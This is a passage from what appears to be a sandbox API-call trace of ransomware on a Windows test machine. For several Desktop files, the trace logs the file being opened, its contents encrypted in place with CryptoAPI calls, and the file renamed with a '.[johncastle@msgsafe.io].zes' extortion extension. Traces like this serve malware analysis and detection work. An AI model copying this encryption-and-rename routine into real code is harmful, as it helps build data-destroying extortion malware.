hFile=0x124, lpBuffer=0x544aa0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x544aa0*, lpNumberOfBytesWritten=0x23ffc90*=0x50, lpOverlapped=0x0) returned 1 [0133.968] WriteFile (in: hFile=0x124, lpBuffer=0x23ffc98*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x23ffc98*, lpNumberOfBytesWritten=0x23ffc90*=0x4, lpOverlapped=0x0) returned 1 [0133.968] WriteFile (in: hFile=0x124, lpBuffer=0x544b60*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x544b60*, lpNumberOfBytesWritten=0x23ffc90*=0x10, lpOverlapped=0x0) returned 1 [0133.968] WriteFile (in: hFile=0x124, lpBuffer=0x544a18*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x544a18*, lpNumberOfBytesWritten=0x23ffc90*=0x80, lpOverlapped=0x0) returned 1 [0133.969] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x23ffcb8 | out: lpNewFilePointer=0x0) returned 1 [0133.969] WriteFile (in: hFile=0x124, lpBuffer=0x23ffca8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x23ffca8*, lpNumberOfBytesWritten=0x23ffc90*=0x8, lpOverlapped=0x0) returned 1 [0133.969] CryptImportKey (in: hProv=0x534c10, pbData=0x544958, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x23ffc94 | out: phKey=0x23ffc94*=0x53a5f8) returned 1 [0133.969] CryptSetKeyParam (hKey=0x53a5f8, dwParam=0x1, pbData=0x544b60, dwFlags=0x0) returned 1 [0133.969] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.969] ReadFile (in: hFile=0x124, lpBuffer=0x2140020, nNumberOfBytesToRead=0x5b60, lpNumberOfBytesRead=0x23ffc9c, lpOverlapped=0x0 | out: lpBuffer=0x2140020*, lpNumberOfBytesRead=0x23ffc9c*=0x5b60, lpOverlapped=0x0) returned 1 [0133.969] CryptEncrypt (in: hKey=0x53a5f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2140020*, pdwDataLen=0x23ffc78*=0x5b60, dwBufLen=0x5b60 | out: pbData=0x2140020*, pdwDataLen=0x23ffc78*=0x5b60) returned 1 [0133.969] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.970] WriteFile (in: hFile=0x124, lpBuffer=0x2140020*, nNumberOfBytesToWrite=0x5b60, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x2140020*, lpNumberOfBytesWritten=0x23ffc90*=0x5b60, lpOverlapped=0x0) returned 1 [0133.970] CryptDestroyKey (hKey=0x53a5f8) returned 1 [0133.970] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x5c44, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.970] SetEndOfFile (hFile=0x124) returned 1 [0133.973] GetProcessHeap () returned 0x520000 [0133.973] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x544aa0 | out: hHeap=0x520000) returned 1 [0133.973] GetProcessHeap () returned 0x520000 [0133.973] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x544b60 | out: hHeap=0x520000) returned 1 [0133.973] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4D-19xSRnhVYoDBhN50S.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\4d-19xsrnhvyodbhn50s.mp4"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4D-19xSRnhVYoDBhN50S.mp4.[4B2E4630].[johncastle@msgsafe.io].zes" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\4d-19xsrnhvyodbhn50s.mp4.[4b2e4630].[johncastle@msgsafe.io].zes")) returned 1 [0133.975] CloseHandle (hObject=0x124) returned 1 [0133.975] WaitForSingleObject (hHandle=0x118, dwMilliseconds=0x0) returned 0x102 [0133.975] FindNextFileW (in: hFindFile=0x544b08, lpFindFileData=0x23ffd20 | out: lpFindFileData=0x23ffd20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b76c7c0, ftCreationTime.dwHighDateTime=0x1d5d86f, ftLastAccessTime.dwLowDateTime=0xe8ad5fc0, ftLastAccessTime.dwHighDateTime=0x1d5e3c0, ftLastWriteTime.dwLowDateTime=0xe8ad5fc0, ftLastWriteTime.dwHighDateTime=0x1d5e3c0, nFileSizeHigh=0x0, nFileSizeLow=0x165b, dwReserved0=0x0, dwReserved1=0xffff, cFileName="5iwkI64gBz.mkv", cAlternateFileName="5IWKI6~1.MKV")) returned 1 [0133.975] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\5iwkI64gBz.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\5iwki64gbz.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0133.975] GetProcessHeap () returned 0x520000 [0133.975] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10) returned 0x544b60 [0133.975] CryptGenRandom (in: hProv=0x534c10, dwLen=0x10, pbBuffer=0x544b60 | out: pbBuffer=0x544b60) returned 1 [0133.975] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x23ffcb0 | out: lpNewFilePointer=0x0) returned 1 [0133.975] WriteFile (in: hFile=0x124, lpBuffer=0x23ffcc0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x23ffcc0*, lpNumberOfBytesWritten=0x23ffc90*=0x5, lpOverlapped=0x0) returned 1 [0133.976] CryptImportKey (in: hProv=0x534c10, pbData=0x544890, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x23ffc94 | out: phKey=0x23ffc94*=0x53a5f8) returned 1 [0133.976] CryptSetKeyParam (hKey=0x53a5f8, dwParam=0x1, pbData=0x544b60, dwFlags=0x0) returned 1 [0133.976] GetProcessHeap () returned 0x520000 [0133.977] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x40) returned 0x535588 [0133.977] CryptEncrypt (in: hKey=0x53a5f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x535588*, pdwDataLen=0x23ffc78*=0x40, dwBufLen=0x40 | out: pbData=0x535588*, pdwDataLen=0x23ffc78*=0x40) returned 1 [0133.977] CryptDestroyKey (hKey=0x53a5f8) returned 1 [0133.977] WriteFile (in: hFile=0x124, lpBuffer=0x535588*, nNumberOfBytesToWrite=0x40, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x535588*, lpNumberOfBytesWritten=0x23ffc90*=0x40, lpOverlapped=0x0) returned 1 [0133.977] WriteFile (in: hFile=0x124, lpBuffer=0x23ffc98*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x23ffc98*, lpNumberOfBytesWritten=0x23ffc90*=0x4, lpOverlapped=0x0) returned 1 [0133.977] WriteFile (in: hFile=0x124, lpBuffer=0x544b60*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x544b60*, lpNumberOfBytesWritten=0x23ffc90*=0x10, lpOverlapped=0x0) returned 1 [0133.977] WriteFile (in: hFile=0x124, lpBuffer=0x544990*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x544990*, lpNumberOfBytesWritten=0x23ffc90*=0x80, lpOverlapped=0x0) returned 1 [0133.977] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x23ffcb8 | out: lpNewFilePointer=0x0) returned 1 [0133.977] WriteFile (in: hFile=0x124, lpBuffer=0x23ffca8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x23ffca8*, lpNumberOfBytesWritten=0x23ffc90*=0x8, lpOverlapped=0x0) returned 1 [0133.977] CryptImportKey (in: hProv=0x534c10, pbData=0x544890, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x23ffc94 | out: phKey=0x23ffc94*=0x53a5f8) returned 1 [0133.977] CryptSetKeyParam (hKey=0x53a5f8, dwParam=0x1, pbData=0x544b60, dwFlags=0x0) returned 1 [0133.977] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.977] ReadFile (in: hFile=0x124, lpBuffer=0x2140020, nNumberOfBytesToRead=0x165b, lpNumberOfBytesRead=0x23ffc9c, lpOverlapped=0x0 | out: lpBuffer=0x2140020*, lpNumberOfBytesRead=0x23ffc9c*=0x165b, lpOverlapped=0x0) returned 1 [0133.978] CryptEncrypt (in: hKey=0x53a5f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2140020*, pdwDataLen=0x23ffc78*=0x1660, dwBufLen=0x1660 | out: pbData=0x2140020*, pdwDataLen=0x23ffc78*=0x1660) returned 1 [0133.978] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.978] WriteFile (in: hFile=0x124, lpBuffer=0x2140020*, nNumberOfBytesToWrite=0x1660, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x2140020*, lpNumberOfBytesWritten=0x23ffc90*=0x1660, lpOverlapped=0x0) returned 1 [0133.978] CryptDestroyKey (hKey=0x53a5f8) returned 1 [0133.978] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x1734, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.978] SetEndOfFile (hFile=0x124) returned 1 [0133.981] GetProcessHeap () returned 0x520000 [0133.981] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x535588 | out: hHeap=0x520000) returned 1 [0133.981] GetProcessHeap () returned 0x520000 [0133.981] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x544b60 | out: hHeap=0x520000) returned 1 [0133.981] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\5iwkI64gBz.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\5iwki64gbz.mkv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\5iwkI64gBz.mkv.[4B2E4630].[johncastle@msgsafe.io].zes" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\5iwki64gbz.mkv.[4b2e4630].[johncastle@msgsafe.io].zes")) returned 1 [0133.985] CloseHandle (hObject=0x124) returned 1 [0133.985] WaitForSingleObject (hHandle=0x118, dwMilliseconds=0x0) returned 0x102 [0133.985] FindNextFileW (in: hFindFile=0x544b08, lpFindFileData=0x23ffd20 | out: lpFindFileData=0x23ffd20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fd9a620, ftCreationTime.dwHighDateTime=0x1d5df20, ftLastAccessTime.dwLowDateTime=0x9b79a3a0, ftLastAccessTime.dwHighDateTime=0x1d5d7cf, ftLastWriteTime.dwLowDateTime=0x9b79a3a0, ftLastWriteTime.dwHighDateTime=0x1d5d7cf, nFileSizeHigh=0x0, nFileSizeLow=0x173b0, dwReserved0=0x0, dwReserved1=0xffff, cFileName="ahtoY.flv", cAlternateFileName="")) returned 1 [0133.985] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ahtoY.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ahtoy.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0133.985] GetProcessHeap () returned 0x520000 [0133.985] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10) returned 0x544b60 [0133.985] CryptGenRandom (in: hProv=0x534c10, dwLen=0x10, pbBuffer=0x544b60 | out: pbBuffer=0x544b60) returned 1 [0133.985] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x23ffcb0 | out: lpNewFilePointer=0x0) returned 1 [0133.986] CryptImportKey (in: hProv=0x534c10, pbData=0x544958, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x23ffc94 | out: phKey=0x23ffc94*=0x53a5f8) returned 1 [0133.986] CryptSetKeyParam (hKey=0x53a5f8, dwParam=0x1, pbData=0x544b60, dwFlags=0x0) returned 1 [0133.986] GetProcessHeap () returned 0x520000 [0133.986] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x30) returned 0x544aa0 [0133.986] CryptEncrypt (in: hKey=0x53a5f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x544aa0*, pdwDataLen=0x23ffc78*=0x30, dwBufLen=0x30 | out: pbData=0x544aa0*, pdwDataLen=0x23ffc78*=0x30) returned 1 [0133.986] CryptDestroyKey (hKey=0x53a5f8) returned 1 [0133.986] WriteFile (in: hFile=0x124, lpBuffer=0x544aa0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x544aa0*, lpNumberOfBytesWritten=0x23ffc90*=0x30, lpOverlapped=0x0) returned 1 [0133.987] WriteFile (in: hFile=0x124, lpBuffer=0x23ffc98*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x23ffc98*, lpNumberOfBytesWritten=0x23ffc90*=0x4, lpOverlapped=0x0) returned 1 [0133.987] WriteFile (in: hFile=0x124, lpBuffer=0x544b60*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x544b60*, lpNumberOfBytesWritten=0x23ffc90*=0x10, lpOverlapped=0x0) returned 1 [0133.987] WriteFile (in: hFile=0x124, lpBuffer=0x544a18*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x544a18*, lpNumberOfBytesWritten=0x23ffc90*=0x80, lpOverlapped=0x0) returned 1 [0133.987] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x23ffcb8 | out: lpNewFilePointer=0x0) returned 1 [0133.987] WriteFile (in: hFile=0x124, lpBuffer=0x23ffca8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x23ffca8*, lpNumberOfBytesWritten=0x23ffc90*=0x8, lpOverlapped=0x0) returned 1 [0133.987] CryptImportKey (in: hProv=0x534c10, pbData=0x544958, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x23ffc94 | out: phKey=0x23ffc94*=0x53a5f8) returned 1 [0133.987] CryptSetKeyParam (hKey=0x53a5f8, dwParam=0x1, pbData=0x544b60, dwFlags=0x0) returned 1 [0133.987] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.987] ReadFile (in: hFile=0x124, lpBuffer=0x2140020, nNumberOfBytesToRead=0x173b0, lpNumberOfBytesRead=0x23ffc9c, lpOverlapped=0x0 | out: lpBuffer=0x2140020*, lpNumberOfBytesRead=0x23ffc9c*=0x173b0, lpOverlapped=0x0) returned 1 [0133.989] CryptEncrypt (in: hKey=0x53a5f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2140020*, pdwDataLen=0x23ffc78*=0x173b0, dwBufLen=0x173b0 | out: pbData=0x2140020*, pdwDataLen=0x23ffc78*=0x173b0) returned 1 [0133.990] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.990] WriteFile (in: hFile=0x124, lpBuffer=0x2140020*, nNumberOfBytesToWrite=0x173b0, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x2140020*, lpNumberOfBytesWritten=0x23ffc90*=0x173b0, lpOverlapped=0x0) returned 1 [0133.991] CryptDestroyKey (hKey=0x53a5f8) returned 1 [0133.991] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x17474, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.991] SetEndOfFile (hFile=0x124) returned 1 [0133.993] GetProcessHeap () returned 0x520000 [0133.993] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x544aa0 | out: hHeap=0x520000) returned 1 [0133.993] GetProcessHeap () returned 0x520000 [0133.993] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x544b60 | out: hHeap=0x520000) returned 1 [0133.993] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ahtoY.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ahtoy.flv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ahtoY.flv.[4B2E4630].[johncastle@msgsafe.io].zes" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ahtoy.flv.[4b2e4630].[johncastle@msgsafe.io].zes")) returned 1 [0134.002] CloseHandle (hObject=0x124) returned 1 [0134.002] WaitForSingleObject (hHandle=0x118, dwMilliseconds=0x0) returned 0x102 [0134.002] FindNextFileW (in: hFindFile=0x544b08, lpFindFileData=0x23ffd20 | out: lpFindFileData=0x23ffd20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe51e86f0, ftCreationTime.dwHighDateTime=0x1d5e3b0, ftLastAccessTime.dwLowDateTime=0x20be99a0, ftLastAccessTime.dwHighDateTime=0x1d5d954, ftLastWriteTime.dwLowDateTime=0x20be99a0, ftLastWriteTime.dwHighDateTime=0x1d5d954, nFileSizeHigh=0x0, nFileSizeLow=0x14043, dwReserved0=0x0, dwReserved1=0xffff, cFileName="aisB0FsXovRbNO53dEZX.swf", cAlternateFileName="AISB0F~1.SWF")) returned 1 [0134.002] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aisB0FsXovRbNO53dEZX.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\aisb0fsxovrbno53dezx.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0134.002] GetProcessHeap () returned 0x520000 [0134.002] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10) returned 0x544b60 [0134.002] CryptGenRandom (in: hProv=0x534c10, dwLen=0x10, pbBuffer=0x544b60 | out: pbBuffer=0x544b60) returned 1 [0134.002] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x23ffcb0 | out: lpNewFilePointer=0x0) returned 1 [0134.002] WriteFile (in: hFile=0x124, lpBuffer=0x23ffcc0*, nNumberOfBytesToWrite=0xd, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x23ffcc0*, lpNumberOfBytesWritten=0x23ffc90*=0xd, lpOverlapped=0x0) returned 1 [0134.003] CryptImportKey (in: hProv=0x534c10, pbData=0x544890, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x23ffc94 | out: phKey=0x23ffc94*=0x53a568) returned 1 [0134.003] CryptSetKeyParam (hKey=0x53a568, dwParam=0x1, pbData=0x544b60, dwFlags=0x0) returned 1 [0134.003] GetProcessHeap () returned 0x520000 [0134.003] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x50) returned 0x544aa0 [0134.003] CryptEncrypt (in: hKey=0x53a568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x544aa0*, pdwDataLen=0x23ffc78*=0x50, dwBufLen=0x50 | out: pbData=0x544aa0*, pdwDataLen=0x23ffc78*=0x50) returned 1 [0134.003] CryptDestroyKey (hKey=0x53a568) returned 1 [0134.003] WriteFile (in: hFile=0x124, lpBuffer=0x544aa0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x544aa0*, lpNumberOfBytesWritten=0x23ffc90*=0x50, lpOverlapped=0x0) returned 1 [0134.003] WriteFile (in: hFile=0x124, lpBuffer=0x23ffc98*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x23ffc98*, lpNumberOfBytesWritten=0x23ffc90*=0x4, lpOverlapped=0x0) returned 1 [0134.003] WriteFile (in: hFile=0x124, lpBuffer=0x544b60*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x544b60*, lpNumberOfBytesWritten=0x23ffc90*=0x10, lpOverlapped=0x0) returned 1 [0134.003] WriteFile (in: hFile=0x124, lpBuffer=0x544990*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x544990*, lpNumberOfBytesWritten=0x23ffc90*=0x80, lpOverlapped=0x0) returned 1 [0134.003] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x23ffcb8 | out: lpNewFilePointer=0x0) returned 1 [0134.003] WriteFile (in: hFile=0x124, lpBuffer=0x23ffca8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x23ffca8*, lpNumberOfBytesWritten=0x23ffc90*=0x8, lpOverlapped=0x0) returned 1 [0134.003] CryptImportKey (in: hProv=0x534c10, pbData=0x544890, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x23ffc94 | out: phKey=0x23ffc94*=0x53a568) returned 1 [0134.004] CryptSetKeyParam (hKey=0x53a568, dwParam=0x1, pbData=0x544b60, dwFlags=0x0) returned 1 [0134.004] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.004] ReadFile (in: hFile=0x124, lpBuffer=0x2140020, nNumberOfBytesToRead=0x14043, lpNumberOfBytesRead=0x23ffc9c, lpOverlapped=0x0 | out: lpBuffer=0x2140020*, lpNumberOfBytesRead=0x23ffc9c*=0x14043, lpOverlapped=0x0) returned 1 [0134.004] CryptEncrypt (in: hKey=0x53a568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2140020*, pdwDataLen=0x23ffc78*=0x14050, dwBufLen=0x14050 | out: pbData=0x2140020*, pdwDataLen=0x23ffc78*=0x14050) returned 1 [0134.005] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.005] WriteFile (in: hFile=0x124, lpBuffer=0x2140020*, nNumberOfBytesToWrite=0x14050, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x2140020*, lpNumberOfBytesWritten=0x23ffc90*=0x14050, lpOverlapped=0x0) returned 1 [0134.005] CryptDestroyKey (hKey=0x53a568) returned 1 [0134.005] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x14134, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.005] SetEndOfFile (hFile=0x124) returned 1 [0134.007] GetProcessHeap () returned 0x520000 [0134.007] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x544aa0 | out: hHeap=0x520000) returned 1 [0134.007] GetProcessHeap () returned 0x520000 [0134.007] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x544b60 | out: hHeap=0x520000) returned 1 [0134.007] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aisB0FsXovRbNO53dEZX.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\aisb0fsxovrbno53dezx.swf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aisB0FsXovRbNO53dEZX.swf.[4B2E4630].[johncastle@msgsafe.io].zes" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\aisb0fsxovrbno53dezx.swf.[4b2e4630].[johncastle@msgsafe.io].zes")) returned 1 [0134.008] CloseHandle (hObject=0x124) returned 1 [0134.008] WaitForSingleObject (hHandle=0x118, dwMilliseconds=0x0) returned 0x102 [0134.008] FindNextFileW (in: hFindFile=0x544b08, lpFindFileData=0x23ffd20 | out: lpFindFileData=0x23ffd20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfb6b1b60, ftCreationTime.dwHighDateTime=0x1d5dcf0, ftLastAccessTime.dwLowDateTime=0x15002f30, ftLastAccessTime.dwHighDateTime=0x1d5e065, ftLastWriteTime.dwLowDateTime=0x15002f30, ftLastWriteTime.dwHighDateTime=0x1d5e065, nFileSizeHigh=0x0, nFileSizeLow=0x11fe8, dwReserved0=0x0, dwReserved1=0xffff, cFileName="bsikVZ.jpg", cAlternateFileName="")) returned 1 [0134.009] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bsikVZ.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\bsikvz.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0134.009] GetProcessHeap () returned 0x520000 [0134.009] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10) returned 0x544b60 [0134.009] CryptGenRandom (in: hProv=0x534c10, dwLen=0x10, pbBuffer=0x544b60 | out: pbBuffer=0x544b60) returned 1 [0134.009] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x23ffcb0 | out: lpNewFilePointer=0x0) returned 1 [0134.009] WriteFile (in: hFile=0x124, lpBuffer=0x23ffcc0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x23ffcc0*, lpNumberOfBytesWritten=0x23ffc90*=0x8, lpOverlapped=0x0) returned 1 [0134.010] CryptImportKey (in: hProv=0x534c10, pbData=0x544958, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x23ffc94 | out: phKey=0x23ffc94*=0x53a568) returned 1 [0134.010] CryptSetKeyParam (hKey=0x53a568, dwParam=0x1, pbData=0x544b60, dwFlags=0x0) returned 1 [0134.010] GetProcessHeap () returned 0x520000 [0134.010] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x30) returned 0x53a5f8 [0134.010] CryptEncrypt (in: hKey=0x53a568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x53a5f8*, pdwDataLen=0x23ffc78*=0x30, dwBufLen=0x30 | out: pbData=0x53a5f8*, pdwDataLen=0x23ffc78*=0x30) returned 1 [0134.010] CryptDestroyKey (hKey=0x53a568) returned 1 [0134.010] WriteFile (in: hFile=0x124, lpBuffer=0x53a5f8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x53a5f8*, lpNumberOfBytesWritten=0x23ffc90*=0x30, lpOverlapped=0x0) returned 1 [0134.011] WriteFile (in: hFile=0x124, lpBuffer=0x23ffc98*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x23ffc98*, lpNumberOfBytesWritten=0x23ffc90*=0x4, lpOverlapped=0x0) returned 1 [0134.011] WriteFile (in: hFile=0x124, lpBuffer=0x544b60*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x544b60*, lpNumberOfBytesWritten=0x23ffc90*=0x10, lpOverlapped=0x0) returned 1 [0134.011] WriteFile (in: hFile=0x124, lpBuffer=0x544a18*, 